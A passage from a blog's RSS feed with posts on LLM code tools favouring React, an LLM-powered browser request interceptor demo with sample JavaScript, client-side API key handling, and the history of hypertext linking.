<li><strong>Web platform APIs</strong>: 0-6 months of real-world usage before training cutoff</li>
<li><strong>New frameworks</strong>: 0-6 months of real-world usage before training cutoff</li>
<li><strong>React patterns</strong>: 10+ years of accumulated examples</li>
</ul>
<p>Today, if your framework or documentation isn&rsquo;t in the training corpus of the LLM, then it won&rsquo;t be output. If the system prompt of the tool a developer uses doesn&rsquo;t have your API, library or framework, then it&rsquo;s not in the output. And if the user of a tool doesn&rsquo;t ask for a specific API, library or framework, then it won&rsquo;t be output. Model providers are skewing it so the model prefers a certain style, or framework or library.</p>
<p>The same dynamic applies to new web platform APIs designed to replace framework features. Consider the typical pattern:</p>
<ol>
<li>Browser teams identify a common pattern in frameworks (e.g., CSS Nesting instead of Sass)</li>
<li>Multi-year standardization process begins</li>
<li>Feature ships in browsers</li>
<li>Developers&hellip; keep using the framework pattern</li>
</ol>
<p>Why? Because:</p>
<ul>
<li><strong>The LLM learned the old pattern</strong>: Sass has 15 years of examples; CSS Nesting has 1 or 2 years</li>
<li><strong>The framework already works</strong>: React developers use styled-components, Tailwind, CSS modules</li>
<li><strong>The ecosystem is built</strong>: Thousands of React component libraries use existing CSS patterns</li>
<li><strong>There&rsquo;s no incentive to switch</strong>: The new platform feature doesn&rsquo;t make the site better for users</li>
</ul>
<p>For example:</p>
<ul>
<li>People loved <a href="https://sass-lang.com/">Sass</a>, but you need a build-step, so we have <a href="https://developer.chrome.com/docs/css-ui/css-nesting">CSS Nesting</a>. However its rarely output because preprocessor patterns are more common in the corpus and also React developers already have CSS-in-JS solutions that LLMs know how to output.</li>
<li>Carousels are hard to build, so maybe we should have them as an intrinsic part of the platform. But there are <a href="https://flowbite.com/docs/components/carousel/#:~:text=Create%20a%20new%20carousel%20object%20using%20the%20options%20set%20above.">tons</a> of <a href="https://daisyui.com/components/carousel/?lang=en">libraries</a> that <a href="https://getbootstrap.com/docs/4.0/components/carousel/">create</a> great <a href="https://www.npmjs.com/package/react-multi-carousel">carousels</a> that are already in LLM training data.</li>
</ul>
<p>As an author of many sites, I love these features. CSS Nesting alone lets me structure my CSS in a way that I personally find easier to read and maintain. But it doesn&rsquo;t really change the quality of the experience of the site for the person using my site. It doesn&rsquo;t change the performance of the site. It doesn&rsquo;t change how accessible my site is. It just makes it easier for me to write and maintain.</p>
<p>The only new platform features that matter are ones that <em>can&rsquo;t be built in user-space</em>, like:</p>
<ul>
<li>Multi-page view transitions (new navigation capabilities)</li>
<li>WebGPU (fundamentally new compute access)</li>
<li>WebAuthN and PassKeys (security primitives)</li>
</ul>
<p>Everything else is competing against entrenched patterns in both React libraries AND LLM training data.</p>
<p>There&rsquo;s at least 3 constituencies to consider here:</p>
<ol>
<li>
<p>The &ldquo;head&rdquo; businesses building on the web - The top 1000 sites take the lion&rsquo;s share of traffic and revenue on the web, and we don&rsquo;t see massive technology shifts in the top 1000 through to top 1 million because these are established sites with established teams and shifting technology is hard with often unclear benefit outside of potential improvements to product velocity. They are likely to be using LLM based tooling to help increase velocity, but they are not going to be switching frameworks or libraries lightly.</p>
</li>
<li>
<p>The &ldquo;middle&rdquo; businesses building on the web - The next 10 million sites are being built by small teams and individuals and will likely be using LLMs to build new sites completely and unless they prompt will use the defaults the tools output</p>
</li>
<li>
<p>The &ldquo;long tail&rdquo; - These are people who are not formal web developers who will use tools like Loveable, Replit, or even directly in a chat app. They may never need to look at the code, so what do any of these new APIs do to help them build better sites? and they represent the growth in the platform and we have an <a href="/transition/">opportunity for millions more people to deploy on to the web</a></p>
</li>
</ol>
<p>The people in groups 2 and 3 are the ones driving the growth in sites on the web and are unlikely to be building with these tools don&rsquo;t know about Passkeys, WebAuthn, Web Components, CSS Nesting, View Transitions, or any of the other new features being added to the platform. They just want a site created that does what they need it to do.</p>
<p>The thing is, the normal people using the web don&rsquo;t care about the tools, frameworks and libraries are not something that concerns a normal person using the web. What concerns people is the experience of using the page. Does it load quickly enough? Are the interactions smooth? Does the site actually do what I need it to do?</p>
<p>Today, if you are a company targeting developers in any of those categories (LLM or a tool that outputs code from an LLM), to not output React by default is to limit your potential audience as your competitors are serving the current demand.</p>
<p>Now consider the current working model for code-generating LLM tools which reflect the ecosystem that they are trained on. This means that any new API, framework or library has a large hurdle to get over in terms of being something that will be output by the tool. The fact that <em>any</em> new feature might not be in the training corpus <em>and</em> will not be prevalent enough to have its usage patterns and idioms ingrained in the training and by extension the output of an LLM should be a concern to the people building new platform features.</p>
<p>Looking at today&rsquo;s trend of tools primarily outputting React code, the comprehensive ecosystem of user-space libraries can do almost everything from custom select boxes, specialized date components and everything else. I can&rsquo;t see a world where a new platform feature is going to displace the libraries in use nor can I see a world where a new framework is going to displace React in the short to medium term—I really love what the Remix folks are doing with Remix 3 and I will keenly watch how it is adopted and how LLMs might pick this up to see how this post plays out in the real world. I&rsquo;d love to see how long it takes for LLMs to start outputting Remix code without specific prompting or including docs in the context.</p>
<p><strong>For framework authors:</strong> Building a new framework is building a product that LLMs won&rsquo;t output for 12-18 months minimum, that has no library ecosystem, that developers don&rsquo;t know, and that companies won&rsquo;t adopt. You&rsquo;re not competing with React&rsquo;s technical merits—you&rsquo;re competing with React&rsquo;s statistical dominance in every LLM training corpus and every tools providers preference for their customer.</p>
<p><strong>For platform developers:</strong> Developer experience features (syntactic sugar, convenience APIs) are competing against established React patterns in LLM training data. They will not be adopted at scale. Focus on fundamental capabilities that can&rsquo;t be built in user-space. For features that browser developers are creating today, we need to take a long hard look at the benefits that they will bring to the user and not the developer. To that extent, many of the platform features ranging from Web Components through to syntactical changes are just not needed by the vast majority of people building sites in the coming years.</p>
<p><strong>For tool creators (e.g, IDEs):</strong> If you&rsquo;re not outputting React by default, you&rsquo;re limiting your addressable market. Your competitors are serving current demand. You can&rsquo;t afford to be principled about framework diversity.</p>
<p>Dead framework theory isn&rsquo;t about frameworks dying. It&rsquo;s about new frameworks being dead on arrival in a world where React has become the platform (at least as long as people need to maintain code.)</p>
<p>As an industry we should absolutely innovate and build new frameworks, libraries and platform features. We need innovation to push the web forward and create competition. But we need to be aware of the dynamics at play and have clear strategies to get our work into LLM training corpus, system prompts, and developer minds.</p>
<p>If the industry continues its current focus on maintainability and developer experience, we&rsquo;ll end up in a world where the web is built by LLMs using React and a handful of libraries entrenched in the training data. Framework innovation stagnates. Platform innovation focuses elsewhere. React becomes infrastructure—invisible and unchangeable.</p>
<p>But here&rsquo;s the optimistic take: If LLM usage continues to grow, tooling vendors will have to compete with each other on this homogenized ecosystem. When everyone outputs React by default, you can&rsquo;t differentiate on framework choice. You have to compete on output quality. Market forces shift the focus from developer experience to user experience.</p>
<p>For either scenario, we need to start competing on user outcomes. I really want to see Evals and Benchmarks that focus on quality outcomes like Core Web Vitals did for performance. When tools compete to attract users, the ones that output meaningfully better experiences will win. This competitive pressure will incentivize the entire ecosystem to optimize for users, not developers.</p>
<p>And if we succeed? Then in the long run, <a href="https://paul.kinlan.me/will-we-care-about-frameworks-in-the-future/">the framework will become irrelevant</a> as the models improve to the point people <a href="https://blog.almaer.com/english-will-become-the-most-popular-development-language-in-6-years/">manipulate sites by words alone</a> and the LLM providers believe they can create better outcomes with their own frameworks or tuning (hat tip to Ade). The delivery technology becomes an optimized compiled output that meets user needs—whether it&rsquo;s &ldquo;React&rdquo; or something else stops mattering.</p>
<p>As for the raw, naked, web platform? Focus on fundamentally new capabilities—the things that can&rsquo;t be built in user-space, or where there&rsquo;s clear user-experience benefit that can&rsquo;t be achieved with libraries.</p>
]]></content:encoded></item><item><title>interception</title><link>https://aifoc.us/interception/</link><pubDate>Sun, 21 Sep 2025 13:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/interception/</guid><description>&lt;p>This is a very quick post. I had an idea as I was walking the dog this evening, and I wanted to build a functioning demo and write about it within a couple of hours.&lt;/p>
&lt;p>While the post and idea started this evening, the genesis of the idea has been brewing for a while and goes back over a year to August 2024, when I wrote about &lt;a href="https://paul.kinlan.me/fictitious-web/">being sucked into a virtual internet&lt;/a>. WebSim has been on my mind for a while, because I loved the idea of being able to simulate my own version of the web using the browser directly and not via another web page. And a couple of weeks ago, I managed to work out how to get &lt;a href="https://pptr.dev/">Puppeteer&lt;/a> to intercept requests and respond with content generated via an LLM.&lt;/p></description><content:encoded><![CDATA[<p>This is a very quick post. I had an idea as I was walking the dog this evening, and I wanted to build a functioning demo and write about it within a couple of hours.</p>
<p>While the post and idea started this evening, the genesis of the idea has been brewing for a while and goes back over a year to August 2024, when I wrote about <a href="https://paul.kinlan.me/fictitious-web/">being sucked into a virtual internet</a>. WebSim has been on my mind for a while, because I loved the idea of being able to simulate my own version of the web using the browser directly and not via another web page. And a couple of weeks ago, I managed to work out how to get <a href="https://pptr.dev/">Puppeteer</a> to intercept requests and respond with content generated via an LLM.</p>
<p><code>npx fauxmium</code> is the command, and there are more details on my <a href="https://paul.kinlan.me/projects/fauxmium/">personal blog</a>. The code is on <a href="https://github.com/paulkinlan/fauxmium">GitHub</a>. You can watch it in action on my YouTube channel:</p>
<div class="youtube">
      <iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/NZ0D2MwNbrM?autoplay=0&amp;controls=1&amp;end=0&amp;loop=0&amp;mute=0&amp;start=0" title="YouTube video"></iframe>
    </div>

<p>The architecture of Fauxmium is relatively straightforward (although there is more complexity in my repository as I try to stream responses). You launch a browser via Puppeteer and set it up to <a href="https://pptr.dev/guides/network-interception">intercept all requests</a>. When a request is made, you send the URL to an LLM (along with a prompt to help it generate content), and it generates HTML or images, which are then returned to the browser.</p>
<figure><img src="/images/fauxmium.png"
    alt="Fauxmium in action">
</figure>

<p>This evening, I was wondering if I could take it a step further and have a large language model (LLM) be in every point of the request lifecycle.</p>
<p>So I built a proof of concept off the back of <code>fauxmium</code> called <code>interceptium</code> [<a href="https://github.com/paulkinlan/interceptium">code</a>]. You launch <a href="https://developer.chrome.com/blog/chrome-for-testing">Chrome for Testing</a> via Puppeteer and set it up to intercept every request. Then, <a href="https://github.com/PaulKinlan/interceptium/blob/e0389616f2b087033054b4f60e47de2d2cb739af/browser.js#L67">when a request is made</a>, you decide if you want to handle the request or let it go to the network. If you want to handle it, you have the chance to change the request (you might want to automatically generate post-data, for example). You send the potentially modified request to the network, get the response, and then you can pass the request data to an LLM, which generates HTML that is then returned to the browser.</p>
<figure><img src="/images/interceptium.png"
    alt="Interceptium and its ability to change request/response">
</figure>

<p>Under the hood this looks like a typical request router that you might see in a web framework. This enables you to have multiple interceptors that can handle different types of requests. You can have one interceptor that handles requests for home pages and summarizes the content and another that will modify an image through something like <code>nano-banana</code>.</p>
<p>A concrete example is below. I like summaries, so I have a <code>SummaryInterceptor</code> that intercepts requests to my blog&rsquo;s homepage, and I ask the LLM to summarize the content of the page. The LLM returns a summary in HTML format, which is then rendered in the browser.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-JavaScript" data-lang="JavaScript"><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">generateText</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#34;ai&#34;</span>;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">import</span> { <span style="color:#a6e22e">createGroq</span> } <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#34;@ai-sdk/groq&#34;</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">groq</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">createGroq</span>({ <span style="color:#a6e22e">apiKey</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">env</span>.<span style="color:#a6e22e">GROQ_API_KEY</span> });
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">class</span> <span style="color:#a6e22e">SummaryInterceptor</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">test</span> <span style="color:#f92672">=</span> (<span style="color:#a6e22e">request</span>) =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#e6db74">&#34;Testing request:&#34;</span>, <span style="color:#a6e22e">request</span>.<span style="color:#a6e22e">url</span>());
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">url</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> <span style="color:#a6e22e">URL</span>(<span style="color:#a6e22e">request</span>.<span style="color:#a6e22e">url</span>());
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">hostname</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#34;paul.kinlan.me&#34;</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">pathname</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#34;/&#34;</span>;
</span></span><span style="display:flex;"><span>  };
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">requestHandler</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">null</span>;
</span></span><span style="display:flex;"><span>  <span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">responseHandler</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">async</span> (<span style="color:#a6e22e">request</span>, <span style="color:#a6e22e">response</span>) =&gt; {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">ai</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">log</span>(<span style="color:#e6db74">&#34;Handling response for:&#34;</span>, <span style="color:#a6e22e">request</span>, <span style="color:#a6e22e">response</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">headers</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">response</span>.<span style="color:#a6e22e">headers</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">status</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">response</span>.<span style="color:#a6e22e">status</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">result</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">generateText</span>({
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">model</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">groq</span>(<span style="color:#e6db74">&#34;openai/gpt-oss-120b&#34;</span>),
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">system</span><span style="color:#f92672">:</span> <span style="color:#e6db74">`You are a world class expert in summarizing web pages. You take the content of a web page and distill it down to the most important points. You return the summary in markdown format. You return HTML only.`</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">prompt</span><span style="color:#f92672">:</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">response</span>.<span style="color:#a6e22e">text</span>(),
</span></span><span style="display:flex;"><span>    });
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> {
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">headers</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">headers</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">status</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">status</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#a6e22e">body</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">result</span>.<span style="color:#a6e22e">text</span>,
</span></span><span style="display:flex;"><span>    };
</span></span><span style="display:flex;"><span>  };
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">constructor</span>(<span style="color:#a6e22e">test</span>) {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">this</span>.<span style="color:#a6e22e">name</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;SummaryInterceptor&#34;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">this</span>.<span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">test</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">test</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">get</span> <span style="color:#a6e22e">test</span>() {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">this</span>.<span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">test</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">get</span> <span style="color:#a6e22e">requestHandler</span>() {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">this</span>.<span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">requestHandler</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">get</span> <span style="color:#a6e22e">responseHandler</span>() {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">this</span>.<span style="color:#960050;background-color:#1e0010">#</span><span style="color:#a6e22e">responseHandler</span>;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">export</span> { <span style="color:#a6e22e">SummaryInterceptor</span> };
</span></span></code></pre></div><p>And you know what? It only flippin&rsquo; works! (Note: I use Groq for this demo because it has an incredibly fast response time. You can use any LLM you like).</p>
<figure><img src="/images/summary.png"
    alt="Interceptium intercepting a request and summarizing the web page">
</figure>

<p>Why is this interesting? Well, it opens up a whole new world of possibilities. You could have interceptors that craft pages to your needs and preferences without the author having to do anything. Some ideas for interceptors that spring to mind are:</p>
<ul>
<li>One that adds links to related content based on my reading history or one that translates content into my preferred language.</li>
<li>One that can augment the structure of the page to make it more navigable or accessible.</li>
<li>One that highlights key information based on my interests—I could imagine indicating that I want to highlight key information about whether a hotel is kid-friendly or has good Wi-Fi.</li>
<li>One that find unstructured data within a page (e.g., a paragraph describing a product&rsquo;s specs) and automatically reformats it into a clean, sortable HTML table. For example, it could turn a camera review into a spec sheet comparing it to other models you&rsquo;ve recently viewed.</li>
<li>One that identifies section breaks and headings to automatically generate and inject a floating &ldquo;Table of Contents&rdquo; for easy navigation.</li>
<li>One that adjusts a recipe page and adds controls to instantly adjust ingredient quantities for a different number of servings. Based on your preferences, it could also automatically convert all measurements to metric and suggest substitutions for dietary restrictions.</li>
</ul>
<p>There are also a lot of risks and challenges with this approach. The security implications are significant, and there would need to be a lot of thought put into how to ensure that users are protected from malicious interceptors that change the functionality or even the content of a page to be misleading, harmful or inserts prompt injections to exfiltrate sensitive information. Not to mention the significant performance considerations and energy requirements from large language models.</p>
<p>That being said, I do think that we should be discussing this type of functionality as a potential future direction for browsers because the ability to customize and adapt the web to our needs is incredibly powerful.</p>
]]></content:encoded></item><item><title>dangerous</title><link>https://aifoc.us/dangerous/</link><pubDate>Fri, 22 Aug 2025 00:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/dangerous/</guid><description>&lt;p>The thing about the web is that you don&amp;rsquo;t know what is on the other end of a link. And yet, we happily click and tab on these blue, underlined pieces of text that could then run practically anything within the confines of that little tabbed rectangle. It&amp;rsquo;s an incredible thing to be able to deliver and run code that is unknown and unseen by the user. Imagine a world where instead of links, you had to visit a store, look at reviews and screenshots, and then install some software before it could be run. Pffft. What are we? Mobile platforms?&lt;/p></description><content:encoded><![CDATA[<p>The thing about the web is that you don&rsquo;t know what is on the other end of a link. And yet, we happily click and tab on these blue, underlined pieces of text that could then run practically anything within the confines of that little tabbed rectangle. It&rsquo;s an incredible thing to be able to deliver and run code that is unknown and unseen by the user. Imagine a world where instead of links, you had to visit a store, look at reviews and screenshots, and then install some software before it could be run. Pffft. What are we? Mobile platforms?</p>
<p>We web users love to live dangerously. Decades of work by browser engines have made the reality of clicking a link and blindly running code by and large safe&hellip; well, safer. When we were coining the <a href="https://paul.kinlan.me/slice-the-web/">SLICE</a> acronym, the &lsquo;S&rsquo; was for security. So much of what we know as the web today is pulled from other origins. Scripts, stylesheets, fonts, images, videos, audio, and entire pages (via iframes) are all able to run in some form on another origin. The <a href="https://en.wikipedia.org/wiki/Same-origin_policy">same-origin</a> model was developed along with Netscape 2.0 to give users confidence that one site couldn&rsquo;t exfiltrate data from another. Process isolation was built to reduce the chance of actions in one tab or site affecting another, and sandboxing lets us run arbitrary code without worrying that it can have access to anything on our systems.</p>
<p>The modern web and the fact that it can do so much is a testament to the browser engineers that have worked for decades on improving the safety of the platform. At the same time, this model puts a real limit on the types of things that we want to do. Try building a client-side RSS reader or a podcast app. The limitation on reading from another origin means that we can&rsquo;t fetch an RSS feed because who would put an <code>Access-Control-Allow-Origin: *</code> header on an XML file, let alone an MP3?</p>
<p>Large language model service providers are my current area of focus and they have an escape hatch with solutions like <code>anthropic-dangerous-direct-browser-access</code> (I&rsquo;m happy to be the first issue to ask for <a href="https://github.com/anthropics/anthropic-sdk-typescript/issues/219">CORS for Anthropic</a>) and <code>dangerouslyAllowBrowser</code>, which let me drop API keys into web pages. This is the solution we have, not the one we need.</p>
<p>We should be able to access services directly from one origin to another without having to proxy everything. The minute I have to make a proxy, I also have to secure it and deal with many of the same problems as having my keys on the client.</p>
<p>OpenAI has had to deal with this head-on with their rather spectacular Real-time Audio API, which is accessible directly in the client because it opens up a WebRTC connection to their services. After all, you can&rsquo;t be expected to proxy the audio through a server.</p>
<blockquote>
<p>Connecting to the Realtime API from the browser should be done with an ephemeral API key.
— <a href="https://platform.openai.com/docs/guides/realtime#:~:text=Connecting%20to%20the%20Realtime%20API%20from%20the%20browser%20should%20be%20done%20with%20an%20ephemeral%20API%20key">OpenAI WebRTC Documentation</a></p></blockquote>
<p>Ephemeral API keys! It&rsquo;s kind of like <a href="https://developer.mozilla.org/en-US/docs/Web/Security/Attacks/CSRF">CSRF</a> protection built into the API. It works well for what it is, providing time-bound access for a single user without completely exposing my API key. The key can still be stolen, but it&rsquo;s only accessible for a relatively short amount of time.</p>
<p>It really feels like we need a scalable platform solution for accessing protected resources on the client, not just LLM APIs. I can&rsquo;t see a world where it&rsquo;s not opt-in from the server, which means we probably won&rsquo;t see a world where we can access and process common resources like RSS feeds and the like. But the need and opportunity seem clear.</p>
<p>I always liked the idea of <a href="https://www.w3.org/TR/webcrypto/#:~:text=The%20handle%20represents,underlying%20cryptographic%20implementation">Opaque JavaScript Objects</a>.</p>
<blockquote>
<p>This specification does not explicitly provide any new storage mechanisms for <code>CryptoKey</code> objects. Instead, by defining serialization and deserialization steps for <code>CryptoKey</code> objects, any existing or future web storage mechanisms that support storing serializable objects can be used to store <code>CryptoKey</code> objects. In practice, it is expected that most authors will make use of the Indexed Database API, which allows associative storage of key/value pairs, where the key is some string identifier meaningful to the application, and the value is a <code>CryptoKey</code> object. This allows the storage and retrieval of key material, without ever exposing that key material to the application or the JavaScript environment. Additionally, this allows authors the full flexibility to store any additional metadata with the <code>CryptoKey</code> itself.
— <a href="https://www.w3.org/TR/webcrypto/#:~:text=This%20specification%20does%20not%20explicitly,used%20to%20store%20CryptoKey%20objects">CryptoKey</a></p></blockquote>
<p>With <code>CryptoKey</code>, user-land JS doesn&rsquo;t have access to the key, but the APIs do. Neat.</p>
<p>Everyone I&rsquo;ve spoken to about this has not wanted to explore it because &ldquo;if the key is on the device, it&rsquo;s compromised,&rdquo; and at some point, it will be visible (e.g., in a network trace). I understand the concern, but then we have situations like we do today where people are putting their API keys in the browser or using temporary tokens. So to me, at least, it feels like an Opaque Object system would help a lot.</p>
<p>I do wonder if there is a concept of a <code>Subscription</code> or <code>Session</code> at the platform level that could be used for providing information about who the user is and what they have access to. If things are all running on the client, it&rsquo;s unlikely there&rsquo;s any &lsquo;secret sauce&rsquo; at the application level. But it would be nice to then apply the <code>Subscription</code> to something like a <code>LanguageModel</code> in Chrome that just uses the user&rsquo;s subscription to 1) use my preferred service, and 2) use my identity.</p>
<p>Maybe the answer is just OAuth, a way to mint API keys for the user and then managing key lifetimes with something like <a href="https://oauth.net/2/dpop/">Demonstration of Proof-of-Possession (DPoP)</a> — I would be very happy if I never had to deal with OAuth again though.</p>
<p>Regardless of the solution, I would love to see more progress in more work to run on the client without the need for proxies. I would love to see a better solution for non-protected resources so that we can enable RSS readers to be a viable client-side experience, and I would love to call protected resources such as an LLM without exposing my service keys or leaking API keys.</p>
]]></content:encoded></item><item><title>hypermedia</title><link>https://aifoc.us/hypermedia/</link><pubDate>Mon, 18 Aug 2025 00:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/hypermedia/</guid><description>&lt;p>I was introduced to the concept of the &lt;a href="https://en.wikipedia.org/wiki/Memex">Memex&lt;/a> after my post about &lt;a href="https://aifoc.us/super-apps/">super-apps&lt;/a>. It&amp;rsquo;s a fascinating view of the future from the late 1940s and early 1950s. &lt;a href="https://en.wikipedia.org/wiki/Vannevar_Bush">Vannevar Bush&lt;/a> presented a vision of an information system that he named the Memex. Ignoring the heavily gendered language and technology that were firmly set in their time (microfilm), &lt;a href="https://www.ias.ac.in/article/fulltext/reso/005/11/0094-0103">&amp;ldquo;As We May Think,&amp;rdquo; the article that introduced the Memex, was a fabulous read that I encourage everyone to explore&lt;/a>.&lt;/p></description><content:encoded><![CDATA[<p>I was introduced to the concept of the <a href="https://en.wikipedia.org/wiki/Memex">Memex</a> after my post about <a href="/super-apps/">super-apps</a>. It&rsquo;s a fascinating view of the future from the late 1940s and early 1950s. <a href="https://en.wikipedia.org/wiki/Vannevar_Bush">Vannevar Bush</a> presented a vision of an information system that he named the Memex. Ignoring the heavily gendered language and technology that were firmly set in their time (microfilm), <a href="https://www.ias.ac.in/article/fulltext/reso/005/11/0094-0103">&ldquo;As We May Think,&rdquo; the article that introduced the Memex, was a fabulous read that I encourage everyone to explore</a>.</p>
<p>I&rsquo;ve been thinking about the nature of hyperlinking for a little while now, and the concept of the Memex pushed me to immerse myself in as much pre-web research about <a href="https://archive.org/details/SelectedPapers1977">hypertext</a> and <a href="https://dl.acm.org/doi/10.1145/800197.806036">hypermedia</a> as I could find, and to learn how people originally thought about it. It was a fun exploration. From spats between researchers to <a href="https://www.w3.org/Xanadu.html">platforms that never shipped</a>, and the incredible firsts shown by pioneers like Douglas Engelbart in &ldquo;<a href="https://en.wikipedia.org/wiki/The_Mother_of_All_Demos">The Mother of All Demos</a>&rdquo;, you can clearly see the path that led to the web becoming the first truly popular and universal hypermedia platform.</p>
<p>I also realized that even though I have been working with HTML for 30 years, I didn&rsquo;t have a clear concept of what the &lsquo;HT&rsquo; truly meant or how the early pioneers envisioned information systems—and how their vision differs from the web we have today.</p>
<p>The early years of hypertext research focused on the opportunities that digital text offered over the print medium. The concept of linking was firmly established in the earliest ideas of hypertext. Vannevar Bush, with his Memex, imagined a system where the <em>user</em>, not the author, would create personal connections between documents. As an individual navigated information, they would forge what Bush called &ldquo;trails&rdquo;—links that were deeply personal and catered to their own memory and thought processes. Other pioneers like Ted Nelson conceptualized even more expansive ideas, such as <em>StretchText</em> , where text could be expanded to reveal layers of additional information, hinting at a far more interactive system than what we have today.</p>
<p><em>A user would create the links.</em></p>
<p>When the web was introduced, it had the concept of hyperlinks, but it wasn&rsquo;t until this past month that I realized its model is fundamentally different. Links are created by the <strong>author</strong> of a page using the static <code>&lt;a&gt;</code> tag. We, the readers, simply follow these pre-defined paths.</p>
<p>This author-centric model has a frustrating side effect that I feel everyday: sites acting like <strong>&ldquo;gravity wells.&rdquo;</strong> An author can guide me to knowledge, but as sites try to capture as much of our time and attention as possible, they reduce the number of external links. I land on a page and find myself trapped, with fewer and fewer paths leading out. Every link is defined by the publisher, not my own curiosity.</p>
<p>How do you make a connection between two articles for your own recall? At best, we have bookmarks.</p>
<p>I can understand why the concept of user-created links didn&rsquo;t develop. Managing URLs is complex, finding URLs was nearly impossible at the start of the web, and the &ldquo;chrome&rdquo; of the browser, with its history and bookmarks, isn&rsquo;t incredibly well understood by most. Not to mention, how would you inject links into a page you don&rsquo;t own and can&rsquo;t write to?</p>
<p>Well, I built an extension that allows you to create and persist user-defined links between any two pieces of content on the web. It turns out that one of the latest changes in how we think about links, the concept behind <a href="https://developer.mozilla.org/en-US/docs/Web/URI/Reference/Fragment/Text_fragments">Text Fragments</a>, is very helpful for identifying pieces of content on a page and giving them a permanent identifier.</p>
<div class="youtube">
      <iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/BD_CWhJzGfQ?autoplay=0&amp;controls=1&amp;end=0&amp;loop=0&amp;mute=0&amp;start=0" title="YouTube video"></iframe>
    </div>

